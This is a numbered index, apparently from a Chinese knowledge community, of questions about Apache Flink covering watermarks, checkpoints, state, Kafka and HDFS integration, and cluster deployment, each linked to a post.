-143、[现在的需求是,统计各个key的今日累计值,一分钟输出一次。如,各个用户今日累计点击次数。这种需求用datastream还是table API方便点?](https://t.zsxq.com/uZnmQzv) - -144、[本地idea可以跑的工程,放在standalone集群上,总报错,报错截图如下,大佬请问这是啥原因](https://t.zsxq.com/BqnYRN7) - -145、[比如现在用k8s起了一个flink集群,这时候数据源kafka或者hdfs会在同一个集群上吗,��是会单独再起一个hdfs/kafka集群](https://t.zsxq.com/7MJujMb) - -146、[flink kafka sink 的FlinkFixedPartitioner 分配策略,在并行度小于topic的partitions时,一个并行实例固定的写消息到固定的一个partition,那么就有一些partition没数据写进去?](https://t.zsxq.com/6U7QFMj) - -147、[基于事件时间,每五分钟一个窗口,五秒钟滑动一次,同时watermark的时间同样是基于事件事件时间的,延迟设为1分钟,假如数据流从12:00开始,如果12:07-12:09期间没有产生任何一条数据,即在12:07-12:09这段间的数据流情况为···· (12:07:00,xxx),(12:09:00,xxx)······,那么窗口[12:02:05-12:07:05],[12:02:10-12:07:10]等几个窗口的计算是否意味着只有等到,12:09:00的数据到达之后才会触发](https://t.zsxq.com/fmq3fYF) - -148、[使用flink1.7,当消费到某条消息(protobuf格式),报Caused by: org.apache.kafka.common.KafkaException: Record batch for partition Notify-18 at offset 1803009 is invalid, cause: Record is corrupt 这个异常。 如何设置跳过已损坏的消息继续消费下一条来保证业务不终断? 我看了官网kafka connectors那里,说在DeserializationSchema.deserialize(...)方法中返回null,flink就会跳过这条消息,然而依旧报这个异常](https://t.zsxq.com/MRvv3ZV) - -149、[是否可以抽空总结一篇Flink 的 watermark 的原理案例?一直没搞明白基于事件时间处理时的数据乱序和数据迟到底咋回事](https://t.zsxq.com/MRJeAuj) - -150、[flink中rpc通信的原理,与几个类的讲解,有没有系统详细的文章样,如有求分享,谢谢](https://t.zsxq.com/2rJyNrF) - -151、[Flink中如何使用基于事件时间处理,但是又不使用Watermarks? 我在会话窗口中使用遇到一些问题,图一是基于处理时间的,测试结果session是基于keyby(用户)的,图二是基于事件时间的,不知道是我用法不对还是怎么的,测试结果发现并不是基于keyby(用户的),而是全局的session。不知道怎么修改?](https://t.zsxq.com/bM3ZZRf) - -152、[flink实时计算平台,yarn模式日志收集怎么做,为什么会checkpoint失败,报警处理,后需要做什么吗?job监控怎么做](https://t.zsxq.com/BMVzzzB) - -153、[有flink与jstorm的在不同应用场景下, 性能比较的数据吗? 从网络上能找大部分都是flink与storm的比较. 在jstorm官网上有一份比较的图表, 感觉参考意义不大, 应该是比较早的flink版本.](https://t.zsxq.com/237EAay) - -154、[为什么使用SessionWindows.withGap窗口的话,State存不了东西呀,每次加1 ,拿出来都是null, 我换成 TimeWindow就没问题。](https://t.zsxq.com/J6eAmYb) - -155、[请问一下,flink datastream流处理怎么统计去重指标? 官方文档中只看到批处理有distinct概念。](https://t.zsxq.com/y3nYZrf) - -156、[好全的一篇文章,对比分析 Flink,Spark Streaming,Storm 框架](https://t.zsxq.com/qRjqFY3) - -157、[关于 structured_streaming 的 paper](https://t.zsxq.com/Eau7qNB) - -158、[zookeeper集群切换领导了,flink集群项目重启了就没有数据的输入和输出了,这个该从哪方面入手解决?](https://t.zsxq.com/rFYbEeq) - -159、[我想请教下datastream怎么和静态数据join呢](https://t.zsxq.com/nEAaYNF) - -160、[时钟问题导致收到了明天的数据,这时候有什么比较好的处理方法?看到有人设置一个最大的跳跃阈值,如果当前数据时间 - 历史最大时间 超过阈值就不更新。如何合理的设计水印,有没有一些经验呢?](https://t.zsxq.com/IAAeiA6) - -161、[大佬们flink怎么定时查询数据库?](https://t.zsxq.com/EuJ2RRf) - -162、[现在我们公司有个想法,就是提供一个页面,在页面上选择source sink 填写上sql语句,然后后台生成一个flink的作业,然后提交到集群。功能有点类似于华为的数据中台,就是页面傻瓜式操作。后台能自动根据相应配置得到结果。请问拘你的了解,可以实现吗?如何实现?有什么好的思路。现在我无从下手](https://t.zsxq.com/vzZBmYB) - -163、[请教一下 flink on yarn 的 ha机制](https://t.zsxq.com/VRFIMfy) - -164、[在一般的流处理以及cep, 都可以对于eventtime设置watermark, 有时可能需要设置相对大一点的值, 这内存压力就比较大, 有没有办法不应用jvm中的内存, 而用堆外内存, 或者其他缓存, 最好有cache机制, 这样可以应对大流量的峰值.](https://t.zsxq.com/FAiiEyr) - -165、[请教一个flink sql的问题。我有两个聚合后的流表A和B,A和Bjoin得到C表。在设置state TTL 的时候是直接对C表设置还是,对A表和B表设置比较好?](https://t.zsxq.com/YnI2F66) - -166、[spark改写为flink,会不会很复杂,还有这两者在SQL方面的支持差别大吗?](https://t.zsxq.com/unyneEU) - -167、[请问flink allowedLateness导致窗口被多次fire,最终数据重复消费,这种问题怎么处理,数据是写到es中](https://t.zsxq.com/RfyZFUR) - -168、[设置taskmanager.numberOfTaskSlots: 4的时候没有问题,但是cpu没有压上去,只用了30%左右,于是设置了taskmanager.numberOfTaskSlots: 8,但是就报错误找不到其中一个自定义的类,然后kafka数据就不消费了。为什么?cpu到多少合适?slot是不是和cpu数量一致是最佳配置?kafka分区数多少合适,是不是和slot,parallesim一致最佳?](https://t.zsxq.com/bIAEyFe) - -169、[需求是根据每条日志切分出需要9个字段,有五个指标再根据9个字段的不同组合去做计算。 第一个方法是:我目前做法是切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,进行一次reduce去重,然后再map取出需要的字段,然后过滤再开5分钟大小1分钟计算一次的滑动窗口窗口进行计算保存结果,这个思路遇到的问题是上一个滑动窗口会每一分钟会计算5分钟数据,到第二个窗口划定的5分钟范围的数据会有好多重复,这个思路会造成数据重复。 第二个方法是:切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,再pross方法里完成所有的过滤,聚合计算,但是再高峰期每分钟400万条数据,这个思路担心在高峰期flink计算不过来](https://t.zsxq.com/BUNfYnY) - -170、[a,b,c三个表,a和c有eventtime,a和c直接join可以,a和b join后再和c join 就会报错,这是怎么回事呢](https://t.zsxq.com/aAqBEY7) - -171、[自定义的source是这样的(图一所示) 使用的时候是这样的(图二所示),为什么无论 sum.print().setParallelism(2)(图2所示)的并行度设置成几最后结果都是这样的](https://t.zsxq.com/zZNNRzr) - -172、[刚接触flink,如有问的不合适的地方,请见谅。 1、为什么说flink是有状态的计算? 2、这个状态是什么?3、状态存在哪里](https://t.zsxq.com/i6Mz7Yj) - -173、[这边用flink 1.8.1的版本,采用flink on yarn,hadoop版本2.6.0。代码是一个简单的滚动窗口统计函数,但启动的时候报错,如下图片。 (2)然后我把flink版本换成1.7.1,重新提交到2.6.0的yarn平台,就能正常运行了。 (3)我们测试集群hadoop版本是3.0,我用flink 1.8.1版本将这个程序再次打包,提交到3.0版本的yarn平台,也能正常运行。 貌似是flink 1.8.1版本与yarn 2.6.0版本不兼容造成的这个问题](https://t.zsxq.com/vNjAIMN) - -174、[StateBackend我使用的是MemoryStateBackend, State是怎么释放内存的,例如我在函数中用ValueState存储了历史状态信息。但是历史状态数据我没有手动释放,那么程序会自动释放么?还是一直驻留在内存中](https://t.zsxq.com/2rVbm6Y) - -175、[请问老师是否可以提供一些Apachebeam的学习资料 谢谢](https://t.zsxq.com/3bIEAyv) - -176、[flink 的 DataSet或者DataStream支持索引查询以及删除吗,像spark rdd,如果不支持的话,该转换成什么](https://t.zsxq.com/yFEyZVB) - -177、[关于flink的状态,能否把它当做数据库使用,类似于内存数据库,在处理过程中存业务数据。如果是数据库可以算是分布式数据库吗?是不是使用rocksdb这种存储方式才算是?支持的单库大小是不是只是跟本地机器的磁盘大小相关?如果使用硬盘存储会不会效率性能有影响](https://t.zsxq.com/VNrn6iI) - -178、[我这边做了个http sink,想要批量发送数据,不过现在只能用数量控制发送,但最后的几个记录没法触发发送动作,想问下有没有什么办法](https://t.zsxq.com/yfmiUvf) - -179、[请问下如何做定时去重计数,就是根据时间分窗口,窗口内根据id去重计数得出结果,多谢。试了不少办法,没有简单直接办法](https://t.zsxq.com/vNvrfmE) - -180、[我有个job使用了elastic search sink. 设置了批量5000一写入,但是看es监控显示每秒只能插入500条。是不是bulkprocessor的currentrequest为0有关](https://t.zsxq.com/rzZbQFA) - -181、[有docker部署flink的资料吗](https://t.zsxq.com/aIur7ai) - -182、[在说明KeyBy的StreamGraph执行过程时,keyBy的ID为啥是6? 根据前面说,ID是一个静态变量,每取一次就递增1,我觉得应该是3啊,是我理解错了吗](https://t.zsxq.com/VjQjqF6) - -183、[有没计划出Execution Graph的远码解析](https://t.zsxq.com/BEmAIQv) - -184、[可以分享下物理执行图怎样划分task,以及task如何执行,还有他们之间数据如何传递这块代码嘛?](https://t.zsxq.com/vVjiYJQ) - -185、[Flink源码和这个学习项目的结构图](https://t.zsxq.com/FyNJQbQ) - -186、[请问flink1.8,如何做到动态加载外部udf-jar包呢?](https://t.zsxq.com/qrjmmaU) - -187、[同一个Task Manager中不同的Slot是怎么交互的,比如:source处理完要传递给map的时候,如果在不同的Slot中,他们的内存是相互隔离,是怎么交互的呢? 我猜是通过序列化和反序列化对象,并且通过网络来进行交互的](https://t.zsxq.com/ZFQjQnm) - -188、[你们有没有这种业务场景。flink从kafka里面取数据,每一条数据里面有mongdb表A的id,这时我会在map的时候采用flink的异步IO连接A表,然后查询出A表的字段1,再根据该字段1又需要异步IO去B表查询字段2,然后又根据字段2去C表查询字段3.....像这样的业务场景,如果多来几种逻辑,我应该用什么方案最好呢](https://t.zsxq.com/YBQFufi) - -189、[今天本地运行flink程序,消费socket中的数据,连续只能消费两条,第三条flink就消费不了了](https://t.zsxq.com/vnufYFY) - -190、[源数据经过过滤后分成了两条流,然后再分别提取事件时间和水印,做时间窗口,我测试时一条流没有数据,另一条的数据看日志到了窗口操作那边就没走下去,貌似窗口一直没有等到触发](https://t.zsxq.com/me6EmM3) - -191、[有做flink cep的吗,有资料没?](https://t.zsxq.com/fubQrvj) - -192、[麻烦问一下 BucketingSink跨集群写,如果任务运行在hadoop A集群,从kafka读取数据处理后写到Hadoo B集群,即使把core-site.xml和hdfs-site.xml拷贝到代码resources下,路径使用hdfs://hadoopB/xxx,会提示ava.lang.RuntimeException: Error while creating FileSystem when initializing the state of the BucketingSink.,跨集群写这个问题 flink不支持吗?](https://t.zsxq.com/fEQVjAe) - -193、[想咨询下,如何对flink中的datastream和dataset进行数据采样](https://t.zsxq.com/fIMVJ2J) - -194、[一个flink作业经常发生oom,可能是什么原因导致的。 处理流程只有15+字段的解析,redis数据读取等操作,TM配置10g。 业务会在夜间刷数据,qps能打到2500左右~](https://t.zsxq.com/7MVjyzz) - -195、[我看到flink 1.8的状态过期仅支持Processing Time,那么如果我使用的是Event time那么状态就不会过期吗](https://t.zsxq.com/jA2NVnU) - -196、[请问我想每隔一小时统计一个属性从当天零点到当前时间的平均值,这样的时间窗该如何定义?](https://t.zsxq.com/BQv33Rb) - -197、[flink任务里面反序列化一个类,报ClassNotFoundException,可是包里面是有这个类的,有遇到这种情况吗?](https://t.zsxq.com/nEAiIea) - -198、[在构造StreamGraph,类似PartitionTransformmation 这种类型的 transform,为什么要添加成一个虚拟节点,而不是一个实际的物理节点呢?](https://t.zsxq.com/RnayrVn) - -199、[flink消费kafka的数据写入到hdfs中,我采用了BucketingSink 这个sink将operator出来的数据写入到hdfs文件上,并通过在hive中建外部表来查询这个。但现在有个问题,处于in-progress的文件,hive是无法识别出来该文件中的数据,可我想能在hive中实时查询进来的数据,且不想产生很多的小文件,这个该如何处理呢](https://t.zsxq.com/A2fYNFA) - -200、[采用Flink单机集群模式一个jobmanager和两个taskmanager,机器是单机是24核,现在做个简单的功能从kafka的一个topic转满足条件的消息到另一个topic,topic的分区是30,我设置了程序默认并发为30,现在每秒消费2w多数据,不够快,请问可以怎么提高job的性能呢?](https://t.zsxq.com/7AurJU3) - -201、[Flink Metric 源码分析](https://t.zsxq.com/Mnm2nI6) - -202、[请问怎么理解官网的这段话?按官网的例子,难道只keyby之后才有keyed state,才能托管Flink存储状态么?source和map如果没有自定义operator state的话,状态是不会被保存的?](https://t.zsxq.com/iAi6QRb) - -203、[想用Flink做业务监控告警,并要能够支持动态添加CEP规则,问下可以直接使用Flink CEP还是siddhi CEP? 有没有相关的资料学习下?谢谢!](https://t.zsxq.com/3rbeuju) - -204、[请问一下,有没有关于水印,触发器的Java方面的demo啊](https://t.zsxq.com/eYJUbm6) - -205、[老师,最近我们线上偶尔出现这种情况,就是40个并行度,其他有一个并行度CheckPoint一直失败,其他39个并行度都是毫秒级别就可以CheckPoint成功,这个怎么定位问题呢?还有个问题 CheckPoint的时间分为三部分 Checkpoint Duration (Async)和 Checkpoint Duration (Sync),还有个 end to end 减去同步和异步的时间,这三部分 分别指代哪块?如果发现这三者中的任意一个步骤时间长,该怎么去优化](https://t.zsxq.com/QvbAqVB) - -206、[我这边有个场景很依赖消费出来的数据的顺序。在源头侧做了很多处理,将kafka修改成一个分区等等很多尝试,最后消费出来的还是乱序的。能不能在flink消费的时候做处理,来保证处理的数据的顺序。](https://t.zsxq.com/JaUZvbY) - -207、[有一个类似于实时计算今天的pv,uv需求,采用source->keyby->window->trigger->process后,在process里采用ValueState计算uv ,问题是 这个window内一天的所有数据是都会缓存到flink嘛? 一天的���据量如果大点,这样实现就有问题了, 这个有其他的实现思路嘛?](https://t.zsxq.com/iQfaAeu) - -208、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J) - -209、[如何监控 Flink 的 TaskManager 和 JobManager](https://t.zsxq.com/IuRJYne) - -210、[问下,在真实流计算过程中,并行度的设置,是与 kafka topic的partition数一样的吗?](https://t.zsxq.com/v7yfEIq) - -211、[Flink的日志 如果自己做平台封装在自己的界面中 请问job Manger 和 taskManger 还有用户自己的程序日志 怎么获取呢 有api还是自己需要利用flume 采集到ELK?](https://t.zsxq.com/Zf2F6mM) - -212、[我想问下一般用Flink统计pv uv是怎么做的?uv存到redis? 每个uv都存到redis,会不会撑爆?](https://t.zsxq.com/72VzBEy) - -213、[Flink的Checkpoint 机制,在有多个source的时候,barrier n 的流将被暂时搁置,从其他流接收的记录将不会被处理,但是会放进一个输入缓存input buffer。如果被缓存的record大小超出了input buffer会怎么样?不可能一直缓存下去吧,如果其中某一条就一直没数据的话,整个过程岂不是卡死了?](https://t.zsxq.com/zBmm2fq) - -214、[公司想实时展示订单数据,汇总金额,并需要和前端交互,实时生成数据需要告诉前端,展示成折线图,这种场景的技术选型是如何呢?包括数据的存储,临时汇总数据的存储,何种形式告诉前端](https://t.zsxq.com/ZnIAi2j) - -215、[请问下checkpoint中存储了哪些东西?](https://t.zsxq.com/7EIeEyJ) - -216、[我这边有个需求是实时计算当前车辆与前车距离,用经纬度求距离。大概6000台车,10秒一条经纬度数据。gps流与自己join的地方在进行checkpoint的时候特别缓,每次要好几分钟。checkpoint 状态后端是rocksDB。有什么比较好的方案吗?自己实现一个类似last_value的函数取车辆最新的经纬再join,或者弄个10秒的滑动窗口输出车辆最新的经纬度再进行join,这样可行吗?](https://t.zsxq.com/euvFaYz) - -217、[flink在启动的时候能不能指定一个时间点从kafka里面恢复数据呢](https://t.zsxq.com/YRnEUFe) - -218、[我们线上有个问题,很多业务都去读某个hive表,但是当这个hive表正在写数据的时候,偶尔出现过 读到表里数据为空的情况,这个问题怎么解决呢?](https://t.zsxq.com/7QJEEyr) - -219、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7) - -220、[flink消费kafka两个不同的topic,然后进行join操作,如果使用事件时间,两个topic都要设置watermaker吗,如果只设置了topic A的watermaker,topic B的不设置会有什么影响吗?](https://t.zsxq.com/uvFU7aY) - -221、[请教一个问题,我的Flink程序运行一段时间就会报这个错误,定位好多天都没有定位到。checkpoint 时间是5秒,20秒都不行。Caused by: java.io.IOException: Could not flush and close the file system output stream to hdfs://HDFSaaaa/flink/PointWideTable_OffTest_Test2/1eb66edcfccce6124c3b2d6ae402ec39/chk-355/1005127c-cee3-4099-8b61-aef819d72404 in order to obtain the stream state handle](https://t.zsxq.com/NNFYJMn) - -222、[Flink的反压机制相比于Storm的反压机制有什么优势呢?问题2: Flink的某一个节点发生故障,是否会影响其他节点的正常工作?还是会通过Checkpoint容错机制吗把任务转移到其他节点去运行呢?](https://t.zsxq.com/yvRNFEI) - -223、[我在验证checkpoint的时候遇到给问题,不管是key state 还是operator state,默认和指定uid是可以的恢复state数据的,当指定uidHash时候无法恢复state数据,麻烦大家给解答一样。我操作state是实现了CheckpointedFunction接口,覆写snapshotState和initializeState,再这两个方法里操作的,然后让程序定时抛出异常,观察发现指定uidHash后snapshotState()方法里context.isRestored()为false,不太明白具体是什么原因](https://t.zsxq.com/ZJmiqZz) - -224、[kafka 中的每条数据需要和 es 中的所有数据(动态增加)关联,关联之后会做一些额外的操作,这个有什么比较可行的方案?](https://t.zsxq.com/mYV37qF) - -225、[flink消费kafka数据,设置1分钟checkpoint一次,假如第一次checkpoint完成以后,还没等到下一次checkpoint,程序就挂了,kafka offset还是第一次checkpoint记录的offset,那么下次重新启动程序,岂不是多消费数据了?那flink的 exactly one消费语义是怎么样的?](https://t.zsxq.com/buFeyZr) - -226、[程序频繁发生Heartbeat of TaskManager with id container_e36_1564049750010_5829_01_000024 timed out. 心跳超时,一天大概10次左右。是内存没给够吗?还是网络波动引起的](https://t.zsxq.com/Znyja62) - -227、[有没有性能优化方面的指导文章?](https://t.zsxq.com/AA6ma2Z) - -228、[flink消费kafka是如何监控消费是否正常的,有啥好办法?](https://t.zsxq.com/a2N37a6) - -229、[我���照官方的wordcount案例写了一个例子,然后在main函数中起了一个线程,原本是准备定时去更新某些配置,准备测试一下是否可行,所以直接在线程函数中打印一条语句测试是否可行。现在测试的结果是不可行,貌似这个线程根本就没有执行,请问这是什么原因呢? 按照理解,JobClient中不是反射类执行main函数吗, 执行main函数的时候为什么没有执行这个线程的打印函数呢?](https://t.zsxq.com/m2FeeMf) - -230、[请问我想保留最近多个完成的checkpoint数据,是通过设置 state.checkpoints.num-retained 吗?要怎么使用?](https://t.zsxq.com/EyFUb6m) - -231、[有没有etl实时数仓相关案例么?比如二十张事实表流join](https://t.zsxq.com/rFeIAeA) - -232、[为什么我扔到flink 的stream job,立刻就finished](https://t.zsxq.com/n2RFmyN) - -233、[有没有在flink上机器学习算法的一些例子啊,除了官网提供的flink exampke里的和flink ml里已有的](https://t.zsxq.com/iqJiyvN) - -234、[如果我想扩展sql的关键词,比如添加一些数据支持,有什么思路,现在想的感觉都要改calcite(刚碰flink感觉难度太大了)](https://t.zsxq.com/uB6aUzZ) - -235、[我想实现统计每5秒中每个类型的次数,这个现在不输出,问题出在哪儿啊](https://t.zsxq.com/2BEeu3Z) - -236、[我用flink往hbase里写数据,有那种直接批量写hfile的方式的demo没](https://t.zsxq.com/VBA6IUR) - -237、[请问怎么监控Kafka消费是否延迟,是否出现消息积压?你有demo吗?这种是用Springboot自己写一个监控,还是咋整啊?](https://t.zsxq.com/IieMFMB) - -238、[请问有计算pv uv的例子吗](https://t.zsxq.com/j2fM3BM) - -239、[通过控制流动态修改window算子窗口类型和长度要怎么写](https://t.zsxq.com/Rb2Z7uB) - -240、[flink的远程调试能出一版么?网上资料坑的多](https://t.zsxq.com/UVbaQfM) - -241、[企业里,Flink开发,java用得多,还是scala用得多?](https://t.zsxq.com/AYVjAuB) - -242、[flink的任务运行在yarn的环境上,在yarn的resourcemanager在进行主备切换时,所有的flink任务都失败了,而MR的任务可以正常运行。报错信息如下:AM is not registered for known application attempt: appattempt_1565306391442_89321_000001 or RM had restarted after AM registered . AM should re-register - 请问这是什么原因,该如何处理呢?](https://t.zsxq.com/j6QfMzf) - -243、[请教一个分布式问题,比如在Flink的多个TaskManager上统计指标count,TM1有两条数据,TM2有一条数据,程序是怎么计算出来是3呢?原理是怎么样的](https://t.zsxq.com/IUVZjUv) - -244、[现在公司部分sql查询oracle数据特别的慢,因为查询条件很多想问一下有什么方法,例如基于大数据组件可以加快查询速度的吗?](https://t.zsxq.com/7MFEQR3) - -245、[想咨询下有没有做过flink同步配置做自定义计算的系统?或者有没有什么好的建议?业务诉求是希望业务用户可以自助配置计算规则做流式计算](https://t.zsxq.com/Mfa6aQB) - -246、[我这边有个实时同步数据的任务,白天运行的时候一直是正常的,一到凌晨2点多之后就没有数据sink进mysql。晚上会有一些离线任务和一些dataX任务同步数据到mysql。但是任务一切都是正常的,ck也很快20ms,数据也是正常消费。看了yarn上的日志,没有任何error。自定义的sink里面也设置了日志打印,但是log里没有。这种如何快速定位问题。](https://t.zsxq.com/z3bunyN) - -247、[有没有flink处理异常数据的案例资料](https://t.zsxq.com/Y3fe6Mn) - -248、[flink中如何传递一个全局变量](https://t.zsxq.com/I2Z7Ybm) - -249、[台4核16G的Flink taskmanager配一个单独的Yarn需要一台啥样的服务器?其他功能都不需要就一个调度的东西?](https://t.zsxq.com/iIUZrju) - -250、[side-output 的分享](https://t.zsxq.com/m6I2BEE) - -251、[使用 InfluxDB + Grafana 监控flink能否配置告警。是不是prometheus更强大点?](https://t.zsxq.com/amURFme) - -252、[我们线上遇到一个问题,带状态的算子没有指定 uid,现在代码必须改,那个带状态的算子 不能正常恢复了,有解吗?通过某种方式能获取到系统之前自动生成的uid吗?](https://t.zsxq.com/rZfyZvn) - -253、[tableEnv.registerDataStream(""Orders"", ds, ""user, product, amount, proctime.proctime, rowtime.rowtime"");请问像这样把流注册成表的时候,这两个rowtime分别是什么意思](https://t.zsxq.com/uZz3Z7Q) - -254、[我想问一下 flink on yarn session 模式下提交任务官网给的例子是 flink run -c xxx.MainClass job.jar 这里是怎么知道 yarn 上的哪个是 flink 的 appid 呢?](https://t.zsxq.com/yBiEyf2) - -255、[Flink Netty Connector 这个有详细的使用例子? 通过Netty建立的source能直接回复消息吗?还是只能被动接受消息?](https://t.zsxq.com/yBeyfqv) - -256、[请问flink sqlclient 提交的作业可以用于生产环境吗?](https://t.zsxq.com/FIEia6M) - -257、[flink批处理写回mysql是否没法用tableEnv.sqlUpdate(""insert into t2 select * from t1"")?作为sink表的t2要如何注册?查跟jdbc相关的就两个TableSink,JDBCAppendTableSink用于BatchTableSink,JDBCUpertTablSink用于StreamTableSink。前者只接受insert into values语法。所以我是先通过select from查询获取到DataSet再JDBCAppendTableSink.emitDataSet(ds)实现的,但这样达不到sql rule any目标](https://t.zsxq.com/ZBIaUvF) - -258、[请问在stream模式下,flink的计算结果在不落库的情况下,可以通过什么restful api获取计算结果吗](https://t.zsxq.com/aq3BIU7) - -259、[现在我有场景,需要把一定的消息发送给kafka topic指定的partition,该怎么搞?](https://t.zsxq.com/NbYnAYF) - -260、[请问我的job作业在idea上运行正常 提交到生产集群里提示Caused by: java.lang.NoSuchMethodError: org.apache.flink.api.java.ClosureCleaner.clean(Ljava/lang/Object;Z)V请问如何解决](https://t.zsxq.com/YfmAMfm) - -261、[遇到一个很奇怪的问题,在使用streamingSQL时,发现timestamp在datastream的时候还是正常的,在注册成表print出来的时候就少了八小时,大佬知道是什么原因么?](https://t.zsxq.com/72n6MVb) - -262、[请问将flink的产生的一些记录日志异步到kafka中,需要如何配置,配置后必须要重启集群才会生效吗](https://t.zsxq.com/RjQFmIQ) - -263、[星主你好,问下flink1.9对维表join的支持怎么样了?有文档吗](https://t.zsxq.com/Q7u3vzR) - -264、[请问下 flink slq: SELECT city_name as city_name, count(1) as total, max(create_time) as create_time FROM * 。代码里面设置窗口为: retractStream.timeWindowAll(Time.minutes(5))一个global窗口,数据写入hdfs 结果数据重复 ,存在两条完全重复的数据如下 常州、2283、 1566230703):请问这是为什么](https://t.zsxq.com/aEEA66M) - -265、[我用rocksdb存储checkpoint,线上运行一段时间发展checkpoint占用空间越来越大,我是直接存本地磁盘上的,怎么样能让它自动清理呢?](https://t.zsxq.com/YNrfyrj) - -266、[flink应该在哪个用户下启动呢,是root的还是在其他的用户呢](https://t.zsxq.com/aAaqFYn) - -267、[link可以读取lzo的文件吗](https://t.zsxq.com/2nUBIAI) - -268、[怎么快速从es里面便利数据?我们公司现在所有的数据都存在Es里面的;我发现每次从里面scan数据的时候特别慢;你那有没有什么好的办法?](https://t.zsxq.com/beIY7mY) - -269、[如果想让数据按照其中一个假如f0进行分区,然后每一个分区做处理的时候并行度都是1怎么设置呢](https://t.zsxq.com/fYnYrR7) - -270、[近在写算子的过程中,使用scala语言写flink比较快,而且在process算子中实现ontime方式时,可以使用scala中的listbuff来输出一个top3的记录;那么到了java中,只能用ArrayList将flink中的ListState使用get()方法取出之后放在ArrayList吗?](https://t.zsxq.com/nQFYrBm) - -271、[请问老师能否出一些1.9版本维表join的例子 包括async和维表缓存?](https://t.zsxq.com/eyRRv7q) - -272、[flink kaka source设置为从组内消费,有个问题是第一次启动任务,我发现kafka中的历史数据不会被消费,而是从当前的数据开始消费,而第二次启动的时候才会从组的offset开始消费,有什么办法可以让第一次启动任务的时候可以消费kafka中的历史数据吗](https://t.zsxq.com/aMRzjMb) - -273、[1.使用flink定时处理离线数据,有时间戳字段,如何求出每分钟的最大值,类似于流处理窗口那样,2如果想自己实现批流统一,有什么好的合并方向吗?比如想让流处理使用批处理的一个算子。](https://t.zsxq.com/3ZjiEMv) - -274、[flink怎么实现流式数据批量对待?流的数据是自定义的source,读取的redis多个Hash表,需要控制批次的概念](https://t.zsxq.com/AIYnEQN) - -275、[有人说不推荐在一个task中开多个线程,这个你怎么看?](https://t.zsxq.com/yJuFEYb) - -276、[想做一个运行在hbase+es架构上的sql查询方案,flink sql能做吗,或者有没有其他的解决方案或者思路?](https://t.zsxq.com/3f6YBmu) - -277、[正在紧急做第一个用到Flink的项目,咨询一下,Flink 1.8.1写入ES7就是用自带的Sink吗?有没有例子分享一下,我搜到的都是写ES6的。这种要求我知道不适合提,主要是急,自己试几下没成功。T T](https://t.zsxq.com/jIAqVnm) - -278、[手动停止任务后,已经保存了最近一次保存点,任务重新启动后,如何使用上一次检查点?](https://t.zsxq.com/2fAiuzf) - -279、[批处理使用流环境(为了使用窗口),那如何确定批处理结束,就是我的任务可以知道批文件读取完事,并且处理完数据后关闭任务,如果不能,那批处理如何实现窗口功能](https://t.zsxq.com/BIiImQN) - -280、[如果限制只能在window 内进行去重,数据量还比较大,有什么好的方法吗?](https://t.zsxq.com/Mjyzj66) - -281、[端到端exactly once有没有出文章](https://t.zsxq.com/yv7Ujme) - -282、[流怎么动态加?,流怎么动态删除?,参数怎么动态修改 (广播](https://t.zsxq.com/IqNZFey) - -283、[自定义的source数据源实现了有批次的概念,然后Flink将这个一个批次流注册为多个表join操作,有办法知道这个sql什么时候计算完成了?](https://t.zsxq.com/r7AqvBq) - -284、[编译 Flink 报错,群主遇到过没,什么原因](https://t.zsxq.com/rvJiyf6) - -285、[我现在是flink on yarn用zookeeper做HA现在在zk里查看检查点信息,为什么里面的文件是ip,而不是路径呢?我该如何拿到那个路径。 - - 排除rest api 方式获取,因为任务关了restapi就没了 - -排除history server,有点不好用](https://t.zsxq.com/nufIaey) - -286、[在使用streamfilesink消费kafka之后进行hdfs写入的时候,当直接关闭flink程序的时候,下次再启动程序消费写入hdfs的时候,文件又是从part-0-0开始,这样就跟原来写入的冲突了,该文件就一直处于ingress状态。](https://t.zsxq.com/Fy3RfE6) - -287、[现在有一个实时数据分析的需求,数据量不大,但要求sink到mysql,因为是实时更新的,我现在能想到的处理方法就是每次插入一条数据的时候,先从mysql读数据,如果有这条,就执行update,没有的话就insert,但是这样的话每写一条数据就有两次交互了。想问一下老师有没有更好的办法,或者flink有没有内置的api可以执行这种不确定是更新还是插入的操作](https://t.zsxq.com/myNF2zj) - -288、[Flink设置了checkpoint,job manage会定期删除check point数据,但是task manage不删除,这个是什么原因](https://t.zsxq.com/ZFiMzrF) - -289、[请教一下使用rocksdb作为statebackend ,在哪里可以监控rocksdb io 内存指标呢](https://t.zsxq.com/z3RzJUV) - -290、[状态的使用场景,以及用法能出个文章不,这块不太了解](https://t.zsxq.com/AUjE2ZR) - -291、[请问一下 Flink 1.9 SQL API中distinct count 是如何实现高效的流式去重的?](https://t.zsxq.com/aaynii6) - -292、[在算子内如何获取当前算子并行度以及当前是第几个task](https://t.zsxq.com/mmEyVJA) - -293、[有没有flink1.9结合hive的demo。kafka到hive](https://t.zsxq.com/fIqNF6y) - -294、[能给讲讲apache calcite吗](https://t.zsxq.com/ne6UZrB) - -295、[请问一下像这种窗口操作,怎么保证程序异常重启后保持数据的状态呢?](https://t.zsxq.com/VbUVFMr) - -296、[请问一下,我在使用kafkasource的时候,把接过来的Jsonstr转化成自定义的一个类型,用的是gson. fromJson(jsonstr,classOf[Entity])报图片上的错误了,不知道怎么解决,在不转直接打印的情况下是没问题的](https://t.zsxq.com/EMZFyZz) - -297、[DataStream读数据库的表,做多表join,能设置时间窗口么,一天去刷一次。流程序会一直拉数据,数据库扛不住了](https://t.zsxq.com/IEieI6a) - -298、[请问一下flink支持多路径通配读取吗?例如路径:s3n://pekdc2-deeplink-01/Kinesis/firehose/2019/07/03/*/* ,通配读取找不到路径。是否需要特殊设置](https://t.zsxq.com/IemmiY7) - -299、[flink yarn环境部署 但是把容器的url地址删除。就会跳转到的hadoop的首页。怎么屏蔽hadoop的yarn首页地址呢?要不暴露这个地址用户能看到所有任务很危险](https://t.zsxq.com/QvZFUNN) - -300、[flink sql怎么写一个流,每秒输出当前时间呢](https://t.zsxq.com/2JiubeM) - -301、[因为想通过sql弄一个数据流。哈哈 另外想问一个问题,我把全局设置为根据处理时间的时间窗口,那么我在processAllWindowFunction里面要怎么知道进来的每个元素的处理时间是多少呢?这个元素进入这个时间窗口的依据是什么](https://t.zsxq.com/bQ33BmM) - -302、[如何实现一个设备上报的数据存储到同一个hdfs文件中?](https://t.zsxq.com/rB6ybYF) - 